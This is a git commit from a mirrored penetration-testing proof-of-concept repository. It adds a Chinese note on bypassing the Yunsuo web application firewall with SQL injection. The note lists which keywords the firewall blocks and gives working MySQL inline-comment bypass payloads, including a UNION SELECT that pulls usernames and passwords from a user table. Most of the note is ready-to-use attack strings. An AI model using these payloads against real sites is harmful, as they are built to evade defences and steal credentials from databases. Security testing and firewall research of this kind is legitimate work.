mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-08-13 03:17:26 +00:00
add bypass云锁注入测试.md
This commit is contained in:
parent
49198c1cd9
commit
810c7f7b10
@ -326,6 +326,7 @@
|
||||
- [SQL注入Bypass安全狗4.0](./books/SQL注入Bypass安全狗4.0.pdf)
|
||||
- [通过正则类SQL注入防御的绕过技巧](./books/通过正则类SQL注入防御的绕过技巧.pdf)
|
||||
- [MYSQL_SQL_BYPASS_WIKI-mysql注入,bypass的一些心得](https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI)
|
||||
- [bypass云锁注入测试](./books/bypass云锁注入测试.md)
|
||||
|
||||
## <span id="head9"> 说明</span>
|
||||
|
||||
|
38
books/bypass云锁注入测试.md
Normal file
38
books/bypass云锁注入测试.md
Normal file
@ -0,0 +1,38 @@
|
||||
## bypass云锁注入测试
|
||||
|
||||
**实验环境**
|
||||
刚去云锁官网下的
|
||||
|
||||
Apache/2.4.23
|
||||
|
||||
PHP/5.4
|
||||
|
||||
mysql 5
|
||||
|
||||
**Paylaod**
|
||||
|
||||
`order by `拦截
|
||||
|
||||

|
||||
|
||||
`order/*!10000by*/5 `
|
||||
|
||||

|
||||
|
||||
union 不拦截
|
||||
select 不拦截
|
||||
union select 拦截
|
||||
union 各种字符 select 拦截
|
||||
`union/*select*/ `不拦截
|
||||
|
||||
`union%20/*!10000all%20select*/%201,2,database/**/(),4,5`
|
||||
|
||||

|
||||
|
||||
`union/*!10000all*//*!10000select+1,password,username*/,4,5%20from%20user`
|
||||
|
||||

|
||||
|
||||
来源:https://www.t00ls.net/articles-55793.html
|
||||
|
||||
欢迎大家投稿注册土司.
|
BIN
img/bypass_yunshuo1.png
Normal file
BIN
img/bypass_yunshuo1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 10 KiB |
BIN
img/bypass_yunshuo2.png
Normal file
BIN
img/bypass_yunshuo2.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 13 KiB |
BIN
img/bypass_yunshuo3.png
Normal file
BIN
img/bypass_yunshuo3.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 8.4 KiB |
BIN
img/bypass_yunshuo4.png
Normal file
BIN
img/bypass_yunshuo4.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 18 KiB |
Loading…
x
Reference in New Issue
Block a user